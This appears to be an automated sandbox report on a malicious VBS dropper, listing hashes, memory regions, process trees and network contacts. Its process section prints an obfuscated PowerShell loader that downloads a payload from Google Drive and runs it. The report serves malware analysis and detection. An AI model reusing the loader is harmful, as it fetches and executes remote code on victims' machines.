SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0250596cd7064b5a57b4367a7ca7af90
SHA1 5e8c88112e62648215b76323353ceedeb0261ce6
SHA256 ef0b6ea2ee2c0cc0a4d9335e5c07599f8aa12adf6473a6a768937463652fcea3
SHA512 d3c1afad19c1a08d15628bd762bbec9e9c2c32a6c7fac3247f6052314199194616234eee928740e233bfb78a8c0a41bdea34987525216690d44f6062a5e42763

memory/1388-326-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/1388-327-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/1388-328-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/1388-329-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/1756-330-0x0000000002640000-0x0000000002680000-memory.dmp

memory/1756-331-0x0000000005ED0000-0x0000000005FD0000-memory.dmp

memory/1756-332-0x00000000050D0000-0x00000000050D1000-memory.dmp

memory/1756-333-0x0000000006530000-0x000000000B2A6000-memory.dmp

memory/1756-334-0x0000000073080000-0x000000007362B000-memory.dmp

memory/1756-336-0x0000000002640000-0x0000000002680000-memory.dmp

memory/1756-337-0x0000000077040000-0x00000000771E9000-memory.dmp

memory/1756-339-0x0000000005ED0000-0x0000000005FD0000-memory.dmp

memory/1756-340-0x0000000077230000-0x0000000077306000-memory.dmp

memory/2488-341-0x0000000077040000-0x00000000771E9000-memory.dmp

memory/2488-342-0x0000000077230000-0x0000000077306000-memory.dmp

memory/2488-343-0x0000000077266000-0x0000000077267000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Tar7B49.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e9a2db3c218cd02fbd23c3ffdd7f9e02
SHA1 8abc9172b0d4631ab0ab99988b25be4529e03644
SHA256 ec015b733fe5f63d3d928e1cd6148e257aa9ee047104c1d4804a82a0471ac76d
SHA512 5a59c89daeab23978422138d6b640c6d67ffc6b15078cd4ceeb8d1ba42445ab7a7a1ffcdc93ffdf202dfd45b470359d3d3d1dd73854bbdcdb9a95da520eea1a6

memory/2488-368-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2488-367-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2488-369-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2488-370-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2488-371-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2488-372-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2488-373-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2488-374-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2488-375-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2488-366-0x0000000000590000-0x0000000005306000-memory.dmp

memory/2488-376-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2488-377-0x0000000000400000-0x0000000000581000-memory.dmp

memory/1388-378-0x000007FEF54C0000-0x000007FEF5E5D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-406356229-2805545415-1236085040-1000\0f5007522459c86e95ffcc62f32308f1_4c23b8b8-1f37-4b25-86d9-da21829a4de6

MD5 d898504a722bff1524134c6ab6a5eaa5
SHA1 e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA512 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-406356229-2805545415-1236085040-1000\0f5007522459c86e95ffcc62f32308f1_4c23b8b8-1f37-4b25-86d9-da21829a4de6

MD5 c07225d4e7d01d31042965f048728a0a
SHA1 69d70b340fd9f44c89adb9a2278df84faa9906b7
SHA256 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA512 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

memory/2488-402-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2488-403-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2488-404-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2488-405-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2488-406-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2488-407-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2488-408-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2488-409-0x0000000000400000-0x0000000000581000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-29 02:11

Reported

2024-03-29 02:14

Platform

win10v2004-20231215-en

Max time kernel

147s

Max time network

150s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Mishitting unwrinkleable Energiindholds Funktionskommandoen Fidusmageriers Refreshfejl #>;$Duefalks=(cmd /c set /A 115^^0);Function Genanvendelsesprocessens ([String]$recriminatory){$Duefalks=[char][int]$Duefalks;$Rygsttte=$Duefalks+'ubstring';$Diskomusikken45=8;$Hamunds=Spiderweb($recriminatory);For($Duplikeringscentral=7; $Duplikeringscentral -lt $Hamunds; $Duplikeringscentral+=$Diskomusikken45){$Seapost=$recriminatory.$Rygsttte.Invoke($Duplikeringscentral, 1);$Orddelingsmulighed=$Orddelingsmulighed+$Seapost;}$Orddelingsmulighed;}function Alfridaric ($Lorenas){& ($Forsmdeligheder) ($Lorenas);}function Spiderweb ([String]$Misc50){$Bagstavnens=$Misc50.Length-1;$Bagstavnens;}$Byretternes248=Genanvendelsesprocessens 'DrawgloTL kfabrr Over.iaMilliarnbirderssAnalogifS.ydskaeFlourisrpibekonrCosiermiCan.idanFrist.rg Ba.jer ';$Skeetskydning=Genanvendelsesprocessens 'A.rdromhTrogonotVa,uumatFangstkpLucidnesDemo og:Korrela/Cathrin/LuftfardPosturarskolebeiMagistrvh.arnaaeAfbe,ed.OndartegDaadlsao Ken inocoendurgTryllekl Duplice Mewlin.Ressortc EquivaoCalefacmTransi,/ LittleuMonozy cR,brish?BeroendecisternxAthelinpOversimoRott.nsrMilie.atViolone=GennemsdTubulidoToxodonwAl.opatnLivsforlIndhaleogradv sa CossnedErnring&UncausaiSolbadsdFranssm= Equiba1G,urmanaChurri,GDolkest3 FormidYBartholp S.alke1UrskoveFFerreir1UnseverBac,pensrStern.drDysonstxei.olag6hermene3 Reprsev Snedk,yCransie_NullipedCute.sp9 AfplukHSmaalotVFourteeRRecontrF MorgenpStonema9Formueg6ForudrejVa.utap6TytonidY FyrresyMrkatenO BlystboKo.omip ';$Forsmdeligheder=Genanvendelsesprocessens ' kao.iniK artaleAvlsk,exsquilge ';$Nontarnishing=Genanvendelsesprocessens 'Scenit.$ForfaldgTeheetrlBulbideoSkrdd rb FeltbeaAsthma.l Bogtil: S stemFL.ckfuliPissescrS veflysImportutMiskredeTartarlm NeodadmbnkhammiPriseligBareboaeTrvetris ananas Cosignv=Negrita AmintorS DiaboltSoullikaMahmoudrGyldenbt Cottag-PetitjoBUdmatniiCohenimtSystemesFam,liaTNulpunkrAntist.aBedmmernCurs rfsStr tegf BrontoeKastorlr .ongae Isacsmo-Kewi omSPupalmyoUncongru guignor,arlatac ComplaeUdkigsm Preclea$MastigoS,urrogakRich,rteblankeeeBaalfrdthist,gesSkruehokb aceroyGrublesdS.ltananSmithieiTirana,nDemi.olgAl erne Jor.vrd-WordmonDStruktueEnpia os ngliktAvn.nbeiUku.lignHamburgaIlialattMind.kei U condo lassisnSponsib .urmoil$BrndeknPGedeostoShanghadKa,tisma Bacillr Trillug.inroweiMozingmdKrameria BenzoxeResolub ';Alfridaric (Genanvendelsesprocessens 'Vuggest$ hjl.elgAlman el .odetiopressesbFit,roya velprolKi.djal:Ter,binPEv,lueroSyltegldCessnanaqui decrstrengtgS nsoreiUncrushd Bygde,aBesveg.eRimbase= Butter$SuppuraeOscillanHensigtvL.rekla: Lynassa DorylipStarttipAutistid DirectaFaa.andtAgainwaaP,octos ') ;Alfridaric (Genanvendelsesprocessens 'urbinatITopissimFdeklinp guanodo Hee.esr Un.xpetCarbone- Pr.mavMAfstignoSidsenudPraelecubotundelSubnutre Organo ChestcoBAeroplai ReparttIsolatisKassablTBlomsterSvabretaSekretsnKortskasAlg,genf SamordeE tusiarMomzerp ') ;$Podargidae=$Podargidae+'\Frosts.sig' ;Alfridaric (Genanvendelsesprocessens 'Sn,rkle$Contrafg anlgsglFo udskoRremas.bKontradaStrouthlTethyst: I orgaLPe agogoDive,gewOverma.e Civilrr Cryb bibrugeranPerspekgLesedpr= Eupadm(Frotte.TThymeeve.ntipsys AccosttFrdigef- und.rcPBioetikabryst utrrfabrihOpsnuse Prevail$UnapparPEnzymetoAuningsdindstila He.oalrMonacidgPalatali.posercdBrugtesaRemed,teExisti.)Micropr ') ;while (-not $Lowering) {Alfridaric (Genanvendelsesprocessens ',lliticIBiogr.ffOmk,stn Intra,(expande$Be,trowFTroubleirystelsrBeskyttsMocmaintVrimlete atriarmHoodw.nm UsneamiFo lngegSolisteeCrispatsOrigina. ryptogJ pol vio.eavelybItho iiS InsolethornhinaBromofotSp kedaeAmaryll Phoenic-Sv vlile YnglinqKondens Turnech$Trendi B pastedySilverer Di inye .ctopotCo,sumetAfspil,e ,drmmerAnisaldnHayb teeStenedesGanoma,2 Apotra4sensefu8Blommes) Rackma Knaste.{GambierSA tsfortBredsaaaHype inrQuadrattPaaskel-ProrateSTakkefelBilulykeProstomeDingoerp ,iggar Unvanta1Psychop}HeroicaeKollapslDeairsssBindemieLarynxe{LnkontoSLommetotPausemeaIndkomsr ignomitnoncomp-,insnarS Ha.vhjlKosysteeDimensiean syrep ,apote Stymper1Undocto;SnakeflACalycinlLogp.rcfTraadner SvageliT gneendTetrapoaF,nansirExp undi NonanicRikoc e Sarasd$EjendomNRbretnio Y.rwhinMerthiotStrgbutaTheophirOozierbnBorog vi,arasitsUvi,kaahWhitis,iforsik.nPlanarigBasella}Yndetel ');Alfridaric (Genanvendelsesprocessens ' Fremsk$SolennegOver,eel PolliwoKo.legibHushcloaSaettemlSponsor:CatheteLHistorioIntercrwPolygone Ostr.crFornje iUlcusdenMegawatgCurforb=Buttonc(Whit.biTtavleskeKommercsPremud.t Titrer-PalladiP AerligaOrdnerntChoristh Regra, A renes$S,ovlplP Wa.erpo Afsk edBund maa BlrervrHjerneagphratriiU snobbdAmmoni,aDolklipeBetving)Sweenys ') ;}Alfridaric (Genanvendelsesprocessens 'I,filtr$CuniculgE.termilUnimbanodosmerebNoncohaaVaude.ilSo,dayf:KoldsveT Gastr.uactino nAerobiogicccadvh HypoamrEsse.eniUd.amrig,vibelghTrioboleDromedadsi natueFinge.sn phos hsDeconta Kodesk=P,ntill RetrostGP rametephosphat Fideju-MngdebeCStenfisoTilsid.nH.gemontAppetiseselvrosnKonebyttAppetiz autarki$Cor,deePLi.refooLaborerd BiltraaGaapa mrRgerierg A.skali.atalied Avn.gea vocatiePhanto ');Alfridaric (Genanvendelsesprocessens 'Istanbu$ Mos uig.uodesflMedullioTinw,reb,rneblaaTanzan l mortif:,ydisolGTyrann,uVict,aldNo dames LandskjUngree aSnavsvam ReproamAllianceS,rngemr vestial Omegnsi L.isteg Inddrie Jum surCognacsePondero Opionsm=Maaneds H,stopa[ Dul,imSSunfishy AttraasMawbountOuttea,eMortensm Suprav.OverhumCHyenineoMilieubn b nelevK,dnappeamphigar AntikltSkotren] Recapi:Oratric:SnoolsuFStyledrrha dlefocla.ichmM.srealBsternebaBleganss Rekvise Cornma6Pu,ridh4ThumbedSSpidsent S.irebr KunstaiRhizocanT.nfoldgOutwinb(Co.simi$ sportsTLabdanuuUnregennSo ostegTr.kkenhSvans arCensureiHeimorcgPre edehUnone,oeBoreensdUnsalareopsigernSidestisUnamend) enants ');Alfridaric (Genanvendelsesprocessens 'vineyar$MeatoscgDisorielMacrospoCr.wbarb Strafba.avortelRoe,ree:systemaSOverskrtde,alityBluebusrEx enseeOrielhvk ordkrioKolonisrFlayflitBurrknoeDividenn Lselame M.ning Stvkon=Superga Parabol[CommonaS VaabenyGe,aniesJablonstLnkontoe.sskabem Colpor.Discli.TAllitteeAnstdelx Boile.t Enz me.Reg,ormECiselernBryststcComp,omo Parasid.lagetsiTaxa.lyn Depl,mgCyphell]Indlgsb:trophyw:ParasolASaetninSWolfsprCData,orIPredefeIAtionsv.AnatropGSunkl.neCayleystFerraraS.pildnetFusi.lyrEjendetiweedlesn Nons,mgRaderer( Housew$ Nonam,GBeva,rou ffhandd.elsstrsVladbj,jMakvr,saS.lkwormForga.gmSprensaeVerju crJoaninalTillrt iUnca ceg PappoueHypercorGeropigeSpritkr).aplont ');Alfridaric (Genanvendelsesprocessens 'Frysesk$LaudanugReburyilPresecuoPana hebScarolaaCif erllJaevnli:Syn.ectMLokumscaOversetrefterslgFokuseriUdvi.linDuennasaNavigatlPad acyiRevengesBoulezkeTilbagerCurvateePr dukttBenzoph=Lituusc$Unho.tiS RestautRegnskayAff.ktirEfterkoeNucleopkRekviemo ro gerrFl.ggintSplejsveOpfriskn SkppedeCimolit. Liges,sVi ediruKlampenb RibonusDuodynatDamb ugr Fond bigennembnBre baagBnne.ta(Grun va3Ffeun i0haandka8Diapaus1Ny urde9De iner7 tilfil,Leucoto3Lopside1Udgan.s9M rgrie2Spklage9smaagri)Matr.li ');Alfridaric $Marginaliseret;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Mishitting unwrinkleable Energiindholds Funktionskommandoen Fidusmageriers Refreshfejl #>;$Duefalks=(cmd /c set /A 115^^0);Function Genanvendelsesprocessens ([String]$recriminatory){$Duefalks=[char][int]$Duefalks;$Rygsttte=$Duefalks+'ubstring';$Diskomusikken45=8;$Hamunds=Spiderweb($recriminatory);For($Duplikeringscentral=7; $Duplikeringscentral -lt $Hamunds; $Duplikeringscentral+=$Diskomusikken45){$Seapost=$recriminatory.$Rygsttte.Invoke($Duplikeringscentral, 1);$Orddelingsmulighed=$Orddelingsmulighed+$Seapost;}$Orddelingsmulighed;}function Alfridaric ($Lorenas){& ($Forsmdeligheder) ($Lorenas);}function Spiderweb ([String]$Misc50){$Bagstavnens=$Misc50.Length-1;$Bagstavnens;}$Byretternes248=Genanvendelsesprocessens 'DrawgloTL kfabrr Over.iaMilliarnbirderssAnalogifS.ydskaeFlourisrpibekonrCosiermiCan.idanFrist.rg Ba.jer ';$Skeetskydning=Genanvendelsesprocessens 'A.rdromhTrogonotVa,uumatFangstkpLucidnesDemo og:Korrela/Cathrin/LuftfardPosturarskolebeiMagistrvh.arnaaeAfbe,ed.OndartegDaadlsao Ken inocoendurgTryllekl Duplice Mewlin.Ressortc EquivaoCalefacmTransi,/ LittleuMonozy cR,brish?BeroendecisternxAthelinpOversimoRott.nsrMilie.atViolone=GennemsdTubulidoToxodonwAl.opatnLivsforlIndhaleogradv sa CossnedErnring&UncausaiSolbadsdFranssm= Equiba1G,urmanaChurri,GDolkest3 FormidYBartholp S.alke1UrskoveFFerreir1UnseverBac,pensrStern.drDysonstxei.olag6hermene3 Reprsev Snedk,yCransie_NullipedCute.sp9 AfplukHSmaalotVFourteeRRecontrF MorgenpStonema9Formueg6ForudrejVa.utap6TytonidY FyrresyMrkatenO BlystboKo.omip ';$Forsmdeligheder=Genanvendelsesprocessens ' kao.iniK artaleAvlsk,exsquilge ';$Nontarnishing=Genanvendelsesprocessens 'Scenit.$ForfaldgTeheetrlBulbideoSkrdd rb FeltbeaAsthma.l Bogtil: S stemFL.ckfuliPissescrS veflysImportutMiskredeTartarlm NeodadmbnkhammiPriseligBareboaeTrvetris ananas Cosignv=Negrita AmintorS DiaboltSoullikaMahmoudrGyldenbt Cottag-PetitjoBUdmatniiCohenimtSystemesFam,liaTNulpunkrAntist.aBedmmernCurs rfsStr tegf BrontoeKastorlr .ongae Isacsmo-Kewi omSPupalmyoUncongru guignor,arlatac ComplaeUdkigsm Preclea$MastigoS,urrogakRich,rteblankeeeBaalfrdthist,gesSkruehokb aceroyGrublesdS.ltananSmithieiTirana,nDemi.olgAl erne Jor.vrd-WordmonDStruktueEnpia os ngliktAvn.nbeiUku.lignHamburgaIlialattMind.kei U condo lassisnSponsib .urmoil$BrndeknPGedeostoShanghadKa,tisma Bacillr Trillug.inroweiMozingmdKrameria BenzoxeResolub ';Alfridaric (Genanvendelsesprocessens 'Vuggest$ hjl.elgAlman el .odetiopressesbFit,roya velprolKi.djal:Ter,binPEv,lueroSyltegldCessnanaqui decrstrengtgS nsoreiUncrushd Bygde,aBesveg.eRimbase= Butter$SuppuraeOscillanHensigtvL.rekla: Lynassa DorylipStarttipAutistid DirectaFaa.andtAgainwaaP,octos ') ;Alfridaric (Genanvendelsesprocessens 'urbinatITopissimFdeklinp guanodo Hee.esr Un.xpetCarbone- Pr.mavMAfstignoSidsenudPraelecubotundelSubnutre Organo ChestcoBAeroplai ReparttIsolatisKassablTBlomsterSvabretaSekretsnKortskasAlg,genf SamordeE tusiarMomzerp ') ;$Podargidae=$Podargidae+'\Frosts.sig' ;Alfridaric (Genanvendelsesprocessens 'Sn,rkle$Contrafg anlgsglFo udskoRremas.bKontradaStrouthlTethyst: I orgaLPe agogoDive,gewOverma.e Civilrr Cryb bibrugeranPerspekgLesedpr= Eupadm(Frotte.TThymeeve.ntipsys AccosttFrdigef- und.rcPBioetikabryst utrrfabrihOpsnuse Prevail$UnapparPEnzymetoAuningsdindstila He.oalrMonacidgPalatali.posercdBrugtesaRemed,teExisti.)Micropr ') ;while (-not $Lowering) {Alfridaric (Genanvendelsesprocessens ',lliticIBiogr.ffOmk,stn Intra,(expande$Be,trowFTroubleirystelsrBeskyttsMocmaintVrimlete atriarmHoodw.nm UsneamiFo lngegSolisteeCrispatsOrigina. ryptogJ pol vio.eavelybItho iiS InsolethornhinaBromofotSp kedaeAmaryll Phoenic-Sv vlile YnglinqKondens Turnech$Trendi B pastedySilverer Di inye .ctopotCo,sumetAfspil,e ,drmmerAnisaldnHayb teeStenedesGanoma,2 Apotra4sensefu8Blommes) Rackma Knaste.{GambierSA tsfortBredsaaaHype inrQuadrattPaaskel-ProrateSTakkefelBilulykeProstomeDingoerp ,iggar Unvanta1Psychop}HeroicaeKollapslDeairsssBindemieLarynxe{LnkontoSLommetotPausemeaIndkomsr ignomitnoncomp-,insnarS Ha.vhjlKosysteeDimensiean syrep ,apote Stymper1Undocto;SnakeflACalycinlLogp.rcfTraadner SvageliT gneendTetrapoaF,nansirExp undi NonanicRikoc e Sarasd$EjendomNRbretnio Y.rwhinMerthiotStrgbutaTheophirOozierbnBorog vi,arasitsUvi,kaahWhitis,iforsik.nPlanarigBasella}Yndetel ');Alfridaric (Genanvendelsesprocessens ' Fremsk$SolennegOver,eel PolliwoKo.legibHushcloaSaettemlSponsor:CatheteLHistorioIntercrwPolygone Ostr.crFornje iUlcusdenMegawatgCurforb=Buttonc(Whit.biTtavleskeKommercsPremud.t Titrer-PalladiP AerligaOrdnerntChoristh Regra, A renes$S,ovlplP Wa.erpo Afsk edBund maa BlrervrHjerneagphratriiU snobbdAmmoni,aDolklipeBetving)Sweenys ') ;}Alfridaric (Genanvendelsesprocessens 'I,filtr$CuniculgE.termilUnimbanodosmerebNoncohaaVaude.ilSo,dayf:KoldsveT Gastr.uactino nAerobiogicccadvh HypoamrEsse.eniUd.amrig,vibelghTrioboleDromedadsi natueFinge.sn phos hsDeconta Kodesk=P,ntill RetrostGP rametephosphat Fideju-MngdebeCStenfisoTilsid.nH.gemontAppetiseselvrosnKonebyttAppetiz autarki$Cor,deePLi.refooLaborerd BiltraaGaapa mrRgerierg A.skali.atalied Avn.gea vocatiePhanto ');Alfridaric (Genanvendelsesprocessens 'Istanbu$ Mos uig.uodesflMedullioTinw,reb,rneblaaTanzan l mortif:,ydisolGTyrann,uVict,aldNo dames LandskjUngree aSnavsvam ReproamAllianceS,rngemr vestial Omegnsi L.isteg Inddrie Jum surCognacsePondero Opionsm=Maaneds H,stopa[ Dul,imSSunfishy AttraasMawbountOuttea,eMortensm Suprav.OverhumCHyenineoMilieubn b nelevK,dnappeamphigar AntikltSkotren] Recapi:Oratric:SnoolsuFStyledrrha dlefocla.ichmM.srealBsternebaBleganss Rekvise Cornma6Pu,ridh4ThumbedSSpidsent S.irebr KunstaiRhizocanT.nfoldgOutwinb(Co.simi$ sportsTLabdanuuUnregennSo ostegTr.kkenhSvans arCensureiHeimorcgPre edehUnone,oeBoreensdUnsalareopsigernSidestisUnamend) enants ');Alfridaric (Genanvendelsesprocessens 'vineyar$MeatoscgDisorielMacrospoCr.wbarb Strafba.avortelRoe,ree:systemaSOverskrtde,alityBluebusrEx enseeOrielhvk ordkrioKolonisrFlayflitBurrknoeDividenn Lselame M.ning Stvkon=Superga Parabol[CommonaS VaabenyGe,aniesJablonstLnkontoe.sskabem Colpor.Discli.TAllitteeAnstdelx Boile.t Enz me.Reg,ormECiselernBryststcComp,omo Parasid.lagetsiTaxa.lyn Depl,mgCyphell]Indlgsb:trophyw:ParasolASaetninSWolfsprCData,orIPredefeIAtionsv.AnatropGSunkl.neCayleystFerraraS.pildnetFusi.lyrEjendetiweedlesn Nons,mgRaderer( Housew$ Nonam,GBeva,rou ffhandd.elsstrsVladbj,jMakvr,saS.lkwormForga.gmSprensaeVerju crJoaninalTillrt iUnca ceg PappoueHypercorGeropigeSpritkr).aplont ');Alfridaric (Genanvendelsesprocessens 'Frysesk$LaudanugReburyilPresecuoPana hebScarolaaCif erllJaevnli:Syn.ectMLokumscaOversetrefterslgFokuseriUdvi.linDuennasaNavigatlPad acyiRevengesBoulezkeTilbagerCurvateePr dukttBenzoph=Lituusc$Unho.tiS RestautRegnskayAff.ktirEfterkoeNucleopkRekviemo ro gerrFl.ggintSplejsveOpfriskn SkppedeCimolit. Liges,sVi ediruKlampenb RibonusDuodynatDamb ugr Fond bigennembnBre baagBnne.ta(Grun va3Ffeun i0haandka8Diapaus1Ny urde9De iner7 tilfil,Leucoto3Lopside1Udgan.s9M rgrie2Spklage9smaagri)Matr.li ');Alfridaric $Marginaliseret;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 4384 -ip 4384

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4384 -s 2632

Network

Country Destination Domain Proto
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 130.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 172.217.16.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 225.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 152.33.115.104.in-addr.arpa udp
US 8.8.8.8:53 178.223.142.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 232.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 202.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 218.135.221.88.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\Preeducated.txt

MD5 6fa3bc0693f9b25f755076e62bd16488
SHA1 d77b88b84c54212206c1bb64b53030b72a090b46
SHA256 77440d6aa22f460064cdbe56994ea71dfe93ab1db91ec5129095d84a4ccfeaf7
SHA512 25e75355d43215518d3f95944d68ac515170a1360cd0ef75cb3cfffb94c0b85749917e219c039fb35a81789f1fcb245e4f9f3172295c65b936abd64e23240d3f

C:\Users\Admin\AppData\Local\Temp\Preeducated.txt

MD5 66dbe46189a99a73b9346672d34c3138
SHA1 2818445ada528c9fd9c04c95369039adde8f6708
SHA256 44446099d2fb29ec6c60d5ab1490eeb9f0a35b1e620342c2fb3ea49354bcc61f
SHA512 b11b12e3859b2092ea8455af5de1e0e15210325e0ad8bd6a51ef6d1cb0f3925480e73342e1c41320060bbf38adea1e6f135628c8087a6c05b37c0330c1fed6ac

C:\Users\Admin\AppData\Local\Temp\Preeducated.txt

MD5 431dee567c8386cb30dba8162227f153
SHA1 819be3b532ceb44a8f39a795494f822e61c76ec8
SHA256 9d6611a404f78948afd12a529462e776b597216139365b3a3f0c0c765e03ff7b
SHA512 e33ebdf090896fd82ad1f9f40ba99af5c5dc60763c0e64278dc0b2a94df31ccf326ff51553bd905caf35354968cec268fe2f0022ccaf650061e8dc504113cdc5

C:\Users\Admin\AppData\Local\Temp\Preeducated.txt

MD5 d66a3ee0adf3cab478770229c65f1325
SHA1 7a346f32392b488ff8ffe1e04b418162ee122f69
SHA256 aeaf13cb0a80ec05e8aebd26fd84b6c14ee6339dcc6012ffae69b0ac9b483d83
SHA512 f38ffb82f54a2d1fd6d833358361879395d0f02860754e1c2dc3bf70d8f572a0a1d757accdd5622071498da32ee2195b57d3c4bba97cd39ce2a8ae86e5e37d07

C:\Users\Admin\AppData\Local\Temp\Preeducated.txt

MD5 574c55c3664ae5736b02b985575ef8fd
SHA1 d6a5ae6ec2186d56e429f0d6d9a820a64ea2e5bd
SHA256 4187466f21a6a3c69282e6bf476b5d33b13304b7a60f724cc5b0bbb5d0c0aed1
SHA512 0e03f11815aa0118369b9f33aea1ba65887130cdc7e7dbd819c4949d0dc38e3a3734395c10f491c25efd7007e80ea205c1944f352e8339ffc46543c9e42468d3

C:\Users\Admin\AppData\Local\Temp\Preeducated.txt

MD5 41077e923293898955e78267b7878339
SHA1 36083128a00b83103bfe8bc36b0042ff6a703012
SHA256 4d9b1845d8c7b9f85c23bf670d2df4757bfdd59ac5ccebee2df7cbb3b26292f0
SHA512 070c9f8fc7fb22dda57f57c950250b4476f4790c91b0e26616db50a053a4b385b302f30d19a82475252e21942532925d64e9216938f37d751af2e2af31f7c922

C:\Users\Admin\AppData\Local\Temp\Preeducated.txt

MD5 a45ba0d9e34080482621cd2538f9b4f8
SHA1 d76f3ecbe487e2a2ce081d59966b546811e517dc
SHA256 3f76198c3a8aa09768b853a462a13de2c4302761f0c2d34de5f761e59033f471
SHA512 a7da77f44be0a7ac8834551b9d3133eb46b65489a1d55df69a3e7039dafcc65d36aeaf5c9efdef4acbe454a852c6c377071c3ce84f47cbdd38eece2d776d8d16

memory/2364-281-0x000001B42A6F0000-0x000001B42A712000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rmtcztfo.v2b.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2364-291-0x00007FFEE7340000-0x00007FFEE7E01000-memory.dmp

memory/2364-293-0x000001B429E30000-0x000001B429E40000-memory.dmp

memory/2364-292-0x000001B429E30000-0x000001B429E40000-memory.dmp

